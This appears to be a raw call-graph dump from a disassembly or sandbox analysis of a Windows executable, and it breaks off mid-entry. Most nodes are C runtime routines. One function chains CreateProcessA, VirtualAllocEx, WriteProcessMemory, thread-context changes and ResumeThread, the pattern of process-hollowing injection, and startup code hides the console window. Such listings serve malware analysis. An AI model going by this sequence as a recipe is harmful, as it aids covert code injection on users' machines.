17998->18000 18003 11004e 17999->18003 18004 ff3fe __dosmaperr 14 API calls 17999->18004 18001 ff3fe __dosmaperr 14 API calls 18000->18001 18002 11003a 18001->18002 18002->17986 18003->17986 18005 11006f 18004->18005 18006 fbbff __strnicoll 41 API calls 18005->18006 18006->18002 18008 ff94e 18007->18008 18009 ff975 18007->18009 18008->18009 18010 105f6b _Fputc 41 API calls 18008->18010 18009->17979 18011 ff96a 18010->18011 18012 108965 ___scrt_uninitialize_crt 66 API calls 18011->18012 18012->18009 18015 108971 __FrameHandler3::FrameUnwindToState 18013->18015 18014 108a35 18016 fbb82 _Fputc 41 API calls 18014->18016 18015->18014 18017 1089c6 18015->18017 18023 108979 18015->18023 18016->18023 18024 10bcdf EnterCriticalSection 18017->18024 18019 1089cc 18020 1089e9 18019->18020 18025 108a6d 18019->18025 18053 108a2d 18020->18053 18023->17979 18024->18019 18026 108a92 18025->18026 18052 108ab5 __fread_nolock 18025->18052 18027 108a96 18026->18027 18029 108af4 18026->18029 18028 fbb82 _Fputc 41 API calls 18027->18028 18028->18052 18030 108b0b 18029->18030 18070 10a24b 18029->18070 18056 1085f1 18030->18056 18034 108b5b 18038 108bbe WriteFile 18034->18038 18039 108b6f 18034->18039 18035 108b1b 18036 108b22 18035->18036 18037 108b45 18035->18037 18036->18052 18073 108589 18036->18073 18078 1081b7 GetConsoleOutputCP 18037->18078 18041 108be0 GetLastError 18038->18041 18050 108b56 18038->18050 18042 108b77 18039->18042 18043 108bac 18039->18043 18041->18050 18046 108b9a 18042->18046 18047 108b7c 18042->18047 18063 10866f 18043->18063 18098 108833 18046->18098 18049 108b85 18047->18049 18047->18052 18091 10874a 18049->18091 18050->18052 18052->18020 18143 10bd02 LeaveCriticalSection 18053->18143 18055 108a33 18055->18023 18057 110028 __fread_nolock 41 API calls 18056->18057 18058 108603 18057->18058 18061 108631 18058->18061 18062 108664 18058->18062 18106 fc660 18058->18106 18060 10864b GetConsoleMode 18060->18062 18061->18060 18061->18062 18062->18034 18062->18035 18068 10867e ___scrt_uninitialize_crt 18063->18068 18064 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18065 108748 18064->18065 18065->18052 18066 1086ee WriteFile 18067 108731 GetLastError 18066->18067 18066->18068 18069 10872f 18067->18069 18068->18066 18068->18069 18069->18064 18121 10a12a 18070->18121 18072 10a264 18072->18030 18074 1085e0 18073->18074 18077 1085ab 18073->18077 18074->18052 18075 1110d6 5 API calls ___scrt_uninitialize_crt 18075->18077 18076 1085e2 GetLastError 18076->18074 18077->18074 18077->18075 18077->18076 18079 108229 18078->18079 18087 108230 _Yarn 18078->18087 18080 fc660 std::_Locinfo::_Locinfo_ctor 41 API calls 18079->18080 18080->18087 18081 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18082 108582 18081->18082 18082->18050 18083 105e38 42 API calls ___scrt_uninitialize_crt 18083->18087 18084 1084ed 18084->18081 18086 108468 WriteFile 18086->18087 18088 108560 GetLastError 18086->18088 18087->18083 18087->18084 18087->18086 18089 10ff20 5 API calls std::_Locinfo::_Locinfo_ctor 18087->18089 18090 1084a8 WriteFile 18087->18090 18140 10a3b7 18087->18140 18088->18084 18089->18087 18090->18087 18090->18088 18096 108759 ___scrt_uninitialize_crt 18091->18096 18092 108818 18093 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18092->18093 18097 108831 18093->18097 18094 1087ce WriteFile 18095 10881a GetLastError 18094->18095 18094->18096 18095->18092 18096->18092 18096->18094 18097->18052 18105 108842 ___scrt_uninitialize_crt 18098->18105 18099 10894a 18100 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18099->18100 18101 108963 18100->18101 18101->18050 18102 10a3b7 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 18102->18105 18103 10894c GetLastError 18103->18099 18104 108901 WriteFile 18104->18103 18104->18105 18105->18099 18105->18102 18105->18103 18105->18104 18107 fb9e6 _Fputc 41 API calls 18106->18107 18108 fc670 18107->18108 18113 1050a7 18108->18113 18114 fc68d 18113->18114 18115 1050be 18113->18115 18117 105105 18114->18117 18115->18114 18116 10cdcc __Getctype 41 API calls 18115->18116 18116->18114 18118 fc69a 18117->18118 18119 10511c 18117->18119 18118->18061 18119->18118 18120 10b4af __strnicoll 41 API calls 18119->18120 18120->18118 18127 10bdb6 18121->18127 18123 10a13c 18124 10a158 SetFilePointerEx 18123->18124 18126 10a144 __fread_nolock 18123->18126 18125 10a170 GetLastError 18124->18125 18124->18126 18125->18126 18126->18072 18128 10bdc3 18127->18128 18129 10bdd8 18127->18129 18130 ff3eb __dosmaperr 14 API calls 18128->18130 18131 ff3eb __dosmaperr 14 API calls 18129->18131 18135 10bdfd 18129->18135 18132 10bdc8 18130->18132 18133 10be08 18131->18133 18134 ff3fe __dosmaperr 14 API calls 18132->18134 18136 ff3fe __dosmaperr 14 API calls 18133->18136 18137 10bdd0 18134->18137 18135->18123 18138 10be10 18136->18138 18137->18123 18139 fbbff __strnicoll 41 API calls 18138->18139 18139->18137 18142 10a3ce WideCharToMultiByte 18140->18142 18142->18087 18143->18055 18144->17962 18145->17547 22516 10e171 22517 10e18a 22516->22517 22518 10e1a8 22516->22518 22517->22518 22519 106182 2 API calls 22517->22519 22519->22517 18204 fbd65 18205 104f0c ___free_lconv_mon 14 API calls 18204->18205 18206 fbd7d 18205->18206 22598 f657e 22599 f658a 22598->22599 22600 f65c1 22599->22600 22604 1008c9 22599->22604 22603 f5f5e 41 API calls 22603->22600 22605 1008dc _Fputc 22604->22605 22610 100800 22605->22610 22607 1008f1 22608 fb93b _Fputc 41 API calls 22607->22608 22609 f65ae 22608->22609 22609->22600 22609->22603 22611 100812 22610->22611 22612 100835 22610->22612 22613 fbb82 _Fputc 41 API calls 22611->22613 22612->22611 22615 10085c 22612->22615 22614 10082d 22613->22614 22614->22607 22618 100705 22615->22618 22619 100711 __FrameHandler3::FrameUnwindToState 22618->22619 22626 ff57b EnterCriticalSection 22619->22626 22621 10071f 22627 100760 22621->22627 22623 10072c 22636 100754 22623->22636 22626->22621 22628 ff935 ___scrt_uninitialize_crt 66 API calls 22627->22628 22629 10077b 22628->22629 22630 107e49 14 API calls 22629->22630 22631 100785 22630->22631 22632 104eaf __dosmaperr 14 API calls 22631->22632 22635 1007a0 22631->22635 22633 1007c4 22632->22633 22634 104f0c ___free_lconv_mon 14 API calls 22633->22634 22634->22635 22635->22623 22639 ff58f LeaveCriticalSection 22636->22639 22638 10073d 22638->22607 22639->22638 20633 108c6d 20634 108c7a 20633->20634 20638 108c92 20633->20638 20635 ff3fe __dosmaperr 14 API calls 20634->20635 20636 108c7f 20635->20636 20637 fbbff __strnicoll 41 API calls 20636->20637 20647 108c8a 20637->20647 20639 108cf1 20638->20639 20640 10a269 14 API calls 20638->20640 20638->20647 20641 105f6b _Fputc 41 API calls 20639->20641 20640->20639 20642 108d0a 20641->20642 20653 109b51 20642->20653 20645 105f6b _Fputc 41 API calls 20646 108d43 20645->20646 20646->20647 20648 105f6b _Fputc 41 API calls 20646->20648 20649 108d51 20648->20649 20649->20647 20650 105f6b _Fputc 41 API calls 20649->20650 20651 108d5f 20650->20651 20652 105f6b _Fputc 41 API calls 20651->20652 20652->20647 20654 109b5d __FrameHandler3::FrameUnwindToState 20653->20654 20655 109b65 20654->20655 20656 109b7d 20654->20656 20657 ff3eb __dosmaperr 14 API calls 20655->20657 20658 109c3a 20656->20658 20662 109bb3 20656->20662 20659 109b6a 20657->20659 20660 ff3eb __dosmaperr 14 API calls 20658->20660 20661 ff3fe __dosmaperr 14 API calls 20659->20661 20663 109c3f 20660->20663 20682 108d12 20661->20682 20664 109bd1 20662->20664 20665 109bbc 20662->20665 20666 ff3fe __dosmaperr 14 API calls 20663->20666 20683 10bcdf EnterCriticalSection 20664->20683 20668 ff3eb __dosmaperr 14 API calls 20665->20668 20667 109bc9 20666->20667 20674 fbbff __strnicoll 41 API calls 20667->20674 20671 109bc1 20668->20671 20670 109bd7 20672 109bf3 20670->20672 20673 109c08 20670->20673 20675 ff3fe __dosmaperr 14 API calls 20671->20675 20676 ff3fe __dosmaperr 14 API calls 20672->20676 20677 109c65 __fread_nolock 53 API calls 20673->20677 20674->20682 20675->20667 20678 109bf8 20676->20678 20679 109c03 20677->20679 20680 ff3eb __dosmaperr 14 API calls 20678->20680 20684 109c32 20679->20684 20680->20679 20682->20645 20682->20647 20683->20670 20687 10bd02 LeaveCriticalSection 20684->20687 20686 109c38 20686->20682 20687->20686 17515 22c018d 17518 22c01c5 17515->17518 17516 22c02d3 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 17517 22c03a2 WriteProcessMemory 17516->17517 17516->17518 17519 22c03e7 17517->17519 17518->17516 17520 22c0392 TerminateProcess 17518->17520 17521 22c03ec WriteProcessMemory 17519->17521 17522 22c0429 WriteProcessMemory Wow64SetThreadContext ResumeThread 17519->17522 17520->17516 17521->17519 21453 f5cad 21456 f5b81 21453->21456 21455 f5cb8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 21457 f5bb2 21456->21457 21458 f5bc4 21457->21458 21460 f6149 21457->21460 21458->21455 21461 f6153 21460->21461 21463 f6171 21460->21463 21466 f5df3 21461->21466 21463->21458 21469 f5e0d 21466->21469 21470 f5e5c 21466->21470 21467 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21468 f5e73 21467->21468 21472 ff6c8 21468->21472 21469->21470 21471 1006cb 69 API calls 21469->21471 21470->21467 21471->21470 21473 ff6db _Fputc 21472->21473 21478 ff5a3 21473->21478 21475 ff6e7 21476 fb93b _Fputc 41 API calls 21475->21476 21477 ff6f3 21476->21477 21477->21463 21479 ff5af __FrameHandler3::FrameUnwindToState 21478->21479 21480 ff5b9 21479->21480 21481 ff5dc 21479->21481 21482 fbb82 _Fputc 41 API calls 21480->21482 21488 ff5d4 21481->21488 21489 ff57b EnterCriticalSection 21481->21489 21482->21488 21484 ff5fa 21490 ff63a 21484->21490 21486 ff607 21504 ff632 21486->21504 21488->21475 21489->21484 21491 ff66a 21490->21491 21492 ff647 21490->21492 21494 ff935 ___scrt_uninitialize_crt 66 API calls 21491->21494 21501 ff662 21491->21501 21493 fbb82 _Fputc 41 API calls 21492->21493 21493->21501 21495 ff682 21494->21495 21507 107e49 21495->21507 21498 105f6b _Fputc 41 API calls 21499 ff696 21498->21499 21511 107f1a 21499->21511 21501->21486 21503 104f0c ___free_lconv_mon 14 API calls 21503->21501 21553 ff58f LeaveCriticalSection 21504->21553 21506 ff638 21506->21488 21508 107e60 21507->21508 21509 ff68a 21507->21509 21508->21509 21510 104f0c ___free_lconv_mon 14 API calls 21508->21510 21509->21498 21510->21509 21512 107f43 21511->21512 21515 ff69d 21511->21515 21513 107f92 21512->21513 21516 107f6a 21512->21516 21514 fbb82 _Fputc 41 API calls 21513->21514 21514->21515 21515->21501 21515->21503 21518 107e89 21516->21518 21519 107e95 __FrameHandler3::FrameUnwindToState 21518->21519 21526 10bcdf EnterCriticalSection 21519->21526 21521 107ea3 21522 107ed4 21521->21522 21527 107fbd 21521->21527 21540 107f0e 21522->21540 21526->21521 21528 10bdb6 __fread_nolock 41 API calls 21527->21528 21531 107fcd 21528->21531 21529 107fd3 21543 10bd25 21529->21543 21531->21529 21533 10bdb6 __fread_nolock 41 API calls 21531->21533 21539 108005 21531->21539 21532 10bdb6 __fread_nolock 41 API calls 21534 108011 CloseHandle 21532->21534 21535 107ffc 21533->21535 21534->21529 21536 10801d GetLastError 21534->21536 21538 10bdb6 __fread_nolock 41 API calls 21535->21538 21536->21529 21537 10802b __fread_nolock 21537->21522 21538->21539 21539->21529 21539->21532 21552 10bd02 LeaveCriticalSection 21540->21552 21542 107ef7 21542->21515 21544 10bd34 21543->21544 21545 10bd9b 21543->21545 21544->21545 21551 10bd5e 21544->21551 21546 ff3fe __dosmaperr 14 API calls 21545->21546 21547 10bda0 21546->21547 21548 ff3eb __dosmaperr 14 API calls 21547->21548 21549 10bd8b 21548->21549 21549->21537 21550 10bd85 SetStdHandle 21550->21549 21551->21549 21551->21550 21552->21542 21553->21506 21762 f60b0 21763 f60b7 21762->21763 21764 f6103 21762->21764 21767 ff57b EnterCriticalSection 21763->21767 21766 f60bc 21767->21766 21776 f64cf 21777 f64f1 21776->21777 21781 f6506 21776->21781 21778 f5df3 69 API calls 21777->21778 21779 f64f6 21778->21779 21779->21781 21782 1000b3 21779->21782 21783 1000d3 21782->21783 21784 1000be 21782->21784 21783->21784 21786 1000da 21783->21786 21785 ff3fe __dosmaperr 14 API calls 21784->21785 21787 1000c3 21785->21787 21792 1003c9 21786->21792 21790 fbbff __strnicoll 41 API calls 21787->21790 21791 1000ce 21790->21791 21791->21781 21793 1003dc _Fputc 21792->21793 21798 100168 21793->21798 21796 fb93b _Fputc 41 API calls 21797 1000e9 21796->21797 21797->21781 21799 100174 __FrameHandler3::FrameUnwindToState 21798->21799 21800 10017a 21799->21800 21801 1001ae 21799->21801 21802 fbb82 _Fputc 41 API calls 21800->21802 21809 ff57b EnterCriticalSection 21801->21809 21804 100195 21802->21804 21804->21796 21805 1001ba 21810 1002dd 21805->21810 21807 1001d1 21819 1001fa 21807->21819 21809->21805 21811 1002f0 21810->21811 21812 100303 21810->21812 21811->21807 21822 100204 21812->21822 21814 100326 21815 ff935 ___scrt_uninitialize_crt 66 API calls 21814->21815 21818 1003b4 21814->21818 21816 100354 21815->21816 21817 10a24b ___scrt_uninitialize_crt 43 API calls 21816->21817 21817->21818 21818->21807 21826 ff58f LeaveCriticalSection 21819->21826 21821 100202 21821->21804 21823 10026d 21822->21823 21824 100215 21822->21824 21823->21814 21824->21823 21825 10a20b __fread_nolock 43 API calls 21824->21825 21825->21823 21826->21821 22838 f65d6 22839 f660e 22838->22839 22840 f65df 22838->22840 22840->22839 22843 ffa0c 22840->22843 22842 f6601 22844 ffa1e 22843->22844 22847 ffa27 ___scrt_uninitialize_crt 22843->22847 22845 ff890 ___scrt_uninitialize_crt 70 API calls 22844->22845 22846 ffa24 22845->22846 22846->22842 22848 ffa38 22847->22848 22851 ff830 22847->22851 22848->22842 22852 ff83c __FrameHandler3::FrameUnwindToState 22851->22852 22859 ff57b EnterCriticalSection 22852->22859 22854 ff84a 22855 ff99e ___scrt_uninitialize_crt 70 API calls 22854->22855 22856 ff85b 22855->22856 22860 ff884 22856->22860 22859->22854 22863 ff58f LeaveCriticalSection 22860->22863 22862 ff86d 22862->22842 22863->22862 18207 f72d0 18208 f72dc __FrameHandler3::FrameUnwindToState 18207->18208 18233 f74d2 18208->18233 18210 f72e3 18211 f743c 18210->18211 18218 f730d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 18210->18218 18272 f7cc9 IsProcessorFeaturePresent 18211->18272 18213 f7443 18276 1020d1 18213->18276 18216 102095 std::locale::_Setgloballocale 23 API calls 18217 f7451 18216->18217 18219 f732c 18218->18219 18220 f73ad 18218->18220 18256 1020ab 18218->18256 18244 101d0f 18220->18244 18223 f73b3 18248 114d20 GetModuleHandleA GetProcAddress GetConsoleWindow 18223->18248 18228 f73d8 18229 f73e1 18228->18229 18263 102086 18228->18263 18266 f7643 18229->18266 18234 f74db 18233->18234 18279 f779c IsProcessorFeaturePresent 18234->18279 18238 f74ec 18239 f74f0 18238->18239 18289 103ce8 18238->18289 18239->18210 18242 f7507 18242->18210 18245 101d1d 18244->18245 18246 101d18 18244->18246 18245->18223 18361 101a69 18246->18361 18249 114d75 GetModuleHandleA GetProcAddress FreeConsole 18248->18249 18689 f7197 18249->18689 18252 f73ca 18261 f7de3 GetModuleHandleW 18252->18261 18254 114db0 18254->18252 18723 114590 18254->18723 18257 1020c1 std::_Locinfo::_Locinfo_ctor 18256->18257 18260 fe356 __FrameHandler3::FrameUnwindToState 18256->18260 18257->18220 18258 1041e0 __Getctype 41 API calls 18258->18260 18259 fea1f __FrameHandler3::FrameUnwindToState 41 API calls 18259->18260 18260->18256 18260->18258 18260->18259 18262 f73d4 18261->18262 18262->18213 18262->18228 18264 101eb9 std::locale::_Setgloballocale 23 API calls 18263->18264 18265 102091 18264->18265 18265->18229 18267 f764f 18266->18267 18268 f73ea 18267->18268 19347 103cfa 18267->19347 18268->18219 18270 f765d 18271 fa52d ___scrt_uninitialize_crt 7 API calls 18270->18271 18271->18268 18273 f7cdf __fread_nolock std::locale::_Setgloballocale 18272->18273 18274 f7d8a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18273->18274 18275 f7dce std::locale::_Setgloballocale 18274->18275 18275->18213 18277 101eb9 std::locale::_Setgloballocale 23 API calls 18276->18277 18278 f7449 18277->18278 18278->18216 18280 f74e7 18279->18280 18281 fa50e 18280->18281 18298 fb5e7 18281->18298 18284 fa517 18284->18238 18286 fa51f 18287 fa52a 18286->18287 18312 fb623 18286->18312 18287->18238 18352 10e17a 18289->18352 18292 fa52d 18293 fa536 18292->18293 18294 fa540 18292->18294 18295 fa6a6 ___vcrt_uninitialize_ptd 6 API calls 18293->18295 18294->18239 18296 fa53b 18295->18296 18297 fb623 ___vcrt_uninitialize_locks DeleteCriticalSection 18296->18297 18297->18294 18299 fb5f0 18298->18299 18301 fb619 18299->18301 18303 fa513 18299->18303 18316 fb82c 18299->18316 18302 fb623 ___vcrt_uninitialize_locks DeleteCriticalSection 18301->18302 18302->18303 18303->18284 18304 fa673 18303->18304 18333 fb73d 18304->18333 18307 fa688 18307->18286 18310 fa6a3 18310->18286 18313 fb64d 18312->18313 18314 fb62e 18312->18314 18313->18284 18315 fb638 DeleteCriticalSection 18314->18315 18315->18313 18315->18315 18321 fb652 18316->18321 18319 fb864 InitializeCriticalSectionAndSpinCount 18320 fb84f 18319->18320 18320->18299 18322 fb66f 18321->18322 18325 fb673 18321->18325 18322->18319 18322->18320 18323 fb6db GetProcAddress 18323->18322 18325->18322 18325->18323 18326 fb6cc 18325->18326 18328 fb6f2 LoadLibraryExW 18325->18328 18326->18323 18327 fb6d4 FreeLibrary 18326->18327 18327->18323 18329 fb739 18328->18329 18330 fb709 GetLastError 18328->18330 18329->18325 18330->18329 18331 fb714 ___vcrt_InitializeCriticalSectionEx 18330->18331 18331->18329 18332 fb72a LoadLibraryExW 18331->18332 18332->18325 18334 fb652 ___vcrt_InitializeCriticalSectionEx 5 API calls 18333->18334 18335 fb757 18334->18335 18336 fb770 TlsAlloc 18335->18336 18337 fa67d 18335->18337 18337->18307 18338 fb7ee 18337->18338 18339 fb652 ___vcrt_InitializeCriticalSectionEx 5 API calls 18338->18339 18340 fb808 18339->18340 18341 fb823 TlsSetValue 18340->18341 18342 fa696 18340->18342 18341->18342 18342->18310 18343 fa6a6 18342->18343 18344 fa6b0 18343->18344 18346 fa6b6 18343->18346 18347 fb778 18344->18347 18346->18307 18348 fb652 ___vcrt_InitializeCriticalSectionEx 5 API calls 18347->18348 18349 fb792 18348->18349 18350 fb7aa TlsFree 18349->18350 18351 fb79e 18349->18351 18350->18351 18351->18346 18353 f74f9 18352->18353 18354 10e18a 18352->18354 18353->18242 18353->18292 18354->18353 18356 106182 18354->18356 18359 106189 18356->18359 18357 1061cc GetStdHandle 18357->18359 18358 10622e 18358->18354 18359->18357 18359->18358 18360 1061df GetFileType 18359->18360 18360->18359 18362 101a72 18361->18362 18365 101a88 18361->18365 18362->18365 18367 101a95 18362->18367 18364 101a7f 18364->18365 18384 101c00 18364->18384 18365->18245 18368 101aa1 18367->18368 18369 101a9e 18367->18369 18392 10b467 18368->18392 18369->18364 18374 101ab2 18376 104f0c ___free_lconv_mon 14 API calls 18374->18376 18375 101abe 18419 101aef 18375->18419 18378 101ab8 18376->18378 18378->18364 18380 104f0c ___free_lconv_mon 14 API calls 18381 101ae2 18380->18381 18382 104f0c ___free_lconv_mon 14 API calls 18381->18382 18383 101ae8 18382->18383 18383->18364 18385 101c71 18384->18385 18390 101c0f 18384->18390 18385->18365 18386 10a3b7 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 18386->18390 18387 104eaf __dosmaperr 14 API calls 18387->18390 18388 101c75 18389 104f0c ___free_lconv_mon 14 API calls 18388->18389 18389->18385 18390->18385 18390->18386 18390->18387 18390->18388 18391 104f0c ___free_lconv_mon 14 API calls 18390->18391 18391->18390 18393 10b470 18392->18393 18394 101aa7 18392->18394 18441 10429b 18393->18441 18398 10b769 GetEnvironmentStringsW 18394->18398 18399 10b781 18398->18399 18400 101aac 18398->18400 18401 10a3b7 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 18399->18401 18400->18374 18400->18375 18402 10b79e 18401->18402 18403 10b7b3 18402->18403 18404 10b7a8 FreeEnvironmentStringsW 18402->18404 18405 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 18403->18405 18404->18400 18406 10b7ba 18405->18406 18407 10b7c2 18406->18407 18408 10b7d3 18406->18408 18409 104f0c ___free_lconv_mon 14 API calls 18407->18409 18410 10a3b7 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 18408->18410 18412 10b7c7 FreeEnvironmentStringsW 18409->18412 18411 10b7e3 18410->18411 18413 10b7f2 18411->18413 18414 10b7ea 18411->18414 18412->18400 18416 104f0c ___free_lconv_mon 14 API calls 18413->18416 18415 104f0c ___free_lconv_mon 14 API calls 18414->18415 18417 10b7f0 FreeEnvironmentStringsW 18415->18417 18416->18417 18417->18400 18420 101b04 18419->18420 18421 104eaf __dosmaperr 14 API calls 18420->18421 18422 101b2b 18421->18422 18423 101b33 18422->18423 18432 101b3d 18422->18432 18424 104f0c ___free_lconv_mon 14 API calls 18423->18424 18440 101ac5 18424->18440 18425 101b9a 18426 104f0c ___free_lconv_mon 14 API calls 18425->18426 18426->18440 18427 104eaf __dosmaperr 14 API calls 18427->18432 18428 101ba9 18683 101bd1 18428->18683 18432->18425 18432->18427 18432->18428 18434 101bc4 18432->18434 18435 104f0c ___free_lconv_mon 14 API calls 18432->18435 18674 103d89 18432->18674 18433 104f0c ___free_lconv_mon 14 API calls 18437 101bb6 18433->18437 18436 fbc2c __Getctype 11 API calls 18434->18436 18435->18432 18438 101bd0 18436->18438 18439 104f0c ___free_lconv_mon 14 API calls 18437->18439 18439->18440 18440->18380 18442 1042a6 18441->18442 18445 1042ac 18441->18445 18443 1067b0 __dosmaperr 6 API calls 18442->18443 18443->18445 18444 1067ef __dosmaperr 6 API calls 18446 1042c6 18444->18446 18445->18444 18447 1042b2 18445->18447 18446->18447 18450 104eaf __dosmaperr 14 API calls 18446->18450 18448 fea1f __FrameHandler3::FrameUnwindToState 41 API calls 18447->18448 18449 1042b7 18447->18449 18451 104330 18448->18451 18466 10b272 18449->18466 18452 1042d6 18450->18452 18453 1042f3 18452->18453 18454 1042de 18452->18454 18455 1067ef __dosmaperr 6 API calls 18453->18455 18456 1067ef __dosmaperr 6 API calls 18454->18456 18457 1042ff 18455->18457 18458 1042ea 18456->18458 18459 104312 18457->18459 18460 104303 18457->18460 18461 104f0c ___free_lconv_mon 14 API calls 18458->18461 18463 10400e __dosmaperr 14 API calls 18459->18463 18462 1067ef __dosmaperr 6 API calls 18460->18462 18461->18447 18462->18458 18464 10431d 18463->18464 18465 104f0c ___free_lconv_mon 14 API calls 18464->18465 18465->18449 18489 10b3c7 18466->18489 18471 10b2b5 18471->18394 18472 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 18473 10b2c6 18472->18473 18474 10b2dc 18473->18474 18475 10b2ce 18473->18475 18507 10b4c2 18474->18507 18477 104f0c ___free_lconv_mon 14 API calls 18475->18477 18477->18471 18479 10b314 18480 ff3fe __dosmaperr 14 API calls 18479->18480 18481 10b319 18480->18481 18482 104f0c ___free_lconv_mon 14 API calls 18481->18482 18482->18471 18483 10b32f 18486 104f0c ___free_lconv_mon 14 API calls 18483->18486 18488 10b35b 18483->18488 18485 104f0c ___free_lconv_mon 14 API calls 18485->18471 18486->18488 18487 10b3a4 18487->18485 18488->18487 18518 10aee4 18488->18518 18490 10b3d3 __FrameHandler3::FrameUnwindToState 18489->18490 18492 10b3ed 18490->18492 18526 fe9a9 EnterCriticalSection 18490->18526 18493 10b29c 18492->18493 18496 fea1f __FrameHandler3::FrameUnwindToState 41 API calls 18492->18496 18500 10aff2 18493->18500 18494 10b429 18527 10b446 18494->18527 18497 10b466 18496->18497 18498 10b3fd 18498->18494 18499 104f0c ___free_lconv_mon 14 API calls 18498->18499 18499->18494 18531 100a6f 18500->18531 18503 10b013 GetOEMCP 18506 10b03c 18503->18506 18504 10b025 18505 10b02a GetACP 18504->18505 18504->18506 18505->18506 18506->18471 18506->18472 18508 10aff2 43 API calls 18507->18508 18509 10b4e2 18508->18509 18511 10b51f IsValidCodePage 18509->18511 18516 10b55b __fread_nolock 18509->18516 18510 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18513 10b309 18510->18513 18512 10b531 18511->18512 18511->18516 18514 10b560 GetCPInfo 18512->18514 18517 10b53a __fread_nolock 18512->18517 18513->18479 18513->18483 18514->18516 18514->18517 18516->18510 18573 10b0c6 18517->18573 18519 10aef0 __FrameHandler3::FrameUnwindToState 18518->18519 18648 fe9a9 EnterCriticalSection 18519->18648 18521 10aefa 18649 10af31 18521->18649 18526->18498 18530 fe9f1 LeaveCriticalSection 18527->18530 18529 10b44d 18529->18492 18530->18529 18532 100a86 18531->18532 18533 100a8d 18531->18533 18532->18503 18532->18504 18533->18532 18534 1041e0 __Getctype 41 API calls 18533->18534 18535 100aae 18534->18535 18539 10507a 18535->18539 18540 100ac4 18539->18540 18541 10508d 18539->18541 18543 1050d8 18540->18543 18541->18540 18547 10cdcc 18541->18547 18544 105100 18543->18544 18545 1050eb 18543->18545 18544->18532 18545->18544 18568 10b4af 18545->18568 18548 10cdd8 __FrameHandler3::FrameUnwindToState 18547->18548 18549 1041e0 __Getctype 41 API calls 18548->18549 18550 10cde1 18549->18550 18557 10ce27 18550->18557 18560 fe9a9 EnterCriticalSection 18550->18560 18552 10cdff 18561 10ce4d 18552->18561 18557->18540 18558 fea1f __FrameHandler3::FrameUnwindToState 41 API calls 18559 10ce4c 18558->18559 18560->18552 18562 10ce10 18561->18562 18563 10ce5b __Getctype 18561->18563 18565 10ce2c 18562->18565 18563->18562 18564 10cb80 __Getctype 14 API calls 18563->18564 18564->18562 18566 fe9f1 std::_Lockit::~_Lockit LeaveCriticalSection 18565->18566 18567 10ce23 18566->18567 18567->18557 18567->18558 18569 1041e0 __Getctype 41 API calls 18568->18569 18570 10b4b4 18569->18570 18571 10b3c7 __strnicoll 41 API calls 18570->18571 18572 10b4bf 18571->18572 18572->18544 18574 10b0ee GetCPInfo 18573->18574 18583 10b1b7 18573->18583 18580 10b106 18574->18580 18574->18583 18576 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18578 10b270 18576->18578 18578->18516 18584 1079fa 18580->18584 18582 107cf1 45 API calls 18582->18583 18583->18576 18585 100a6f __strnicoll 41 API calls 18584->18585 18586 107a1a 18585->18586 18604 10a33b 18586->18604 18588 107ade 18590 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18588->18590 18589 107ad6 18607 f6ff4 18589->18607 18594 107b01 18590->18594 18591 107a47 18591->18588 18591->18589 18593 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 18591->18593 18595 107a6c __fread_nolock __alloca_probe_16 18591->18595 18593->18595 18599 107cf1 18594->18599 18595->18589 18596 10a33b __strnicoll MultiByteToWideChar 18595->18596 18597 107ab7 18596->18597 18597->18589 18598 107ac2 GetStringTypeW 18597->18598 18598->18589 18600 100a6f __strnicoll 41 API calls 18599->18600 18601 107d04 18600->18601 18614 107b03 18601->18614 18605 10a34c MultiByteToWideChar 18604->18605 18605->18591 18608 f700f 18607->18608 18609 f6ffe 18607->18609 18608->18588 18609->18608 18611 fbd65 18609->18611 18612 104f0c ___free_lconv_mon 14 API calls 18611->18612 18613 fbd7d 18612->18613 18613->18608 18615 107b1e __strnicoll 18614->18615 18616 10a33b __strnicoll MultiByteToWideChar 18615->18616 18620 107b64 18616->18620 18617 107cdc 18618 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18617->18618 18619 107cef 18618->18619 18619->18582 18620->18617 18621 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 18620->18621 18623 107b8a __alloca_probe_16 18620->18623 18630 107c10 18620->18630 18621->18623 18622 f6ff4 __freea 14 API calls 18622->18617 18624 10a33b __strnicoll MultiByteToWideChar 18623->18624 18623->18630 18625 107bcf 18624->18625 18625->18630 18642 10696e 18625->18642 18628 107c01 18628->18630 18634 10696e std::_Locinfo::_Locinfo_ctor 6 API calls 18628->18634 18629 107c39 18631 107cc4 18629->18631 18632 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 18629->18632 18635 107c4b __alloca_probe_16 18629->18635 18630->18622 18633 f6ff4 __freea 14 API calls 18631->18633 18632->18635 18633->18630 18634->18630 18635->18631 18636 10696e std::_Locinfo::_Locinfo_ctor 6 API calls 18635->18636 18637 107c8e 18636->18637 18637->18631 18638 10a3b7 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 18637->18638 18639 107ca8 18638->18639 18639->18631 18640 107cb1 18639->18640 18641 f6ff4 __freea 14 API calls 18640->18641 18641->18630 18643 106460 std::_Locinfo::_Locinfo_ctor 5 API calls 18642->18643 18644 106979 18643->18644 18645 10697f 18644->18645 18646 1069cb __strnicoll 5 API calls 18644->18646 18645->18628 18645->18629 18645->18630 18647 1069bf LCMapStringW 18646->18647 18647->18645 18648->18521 18659 100032 18649->18659 18651 10af53 18652 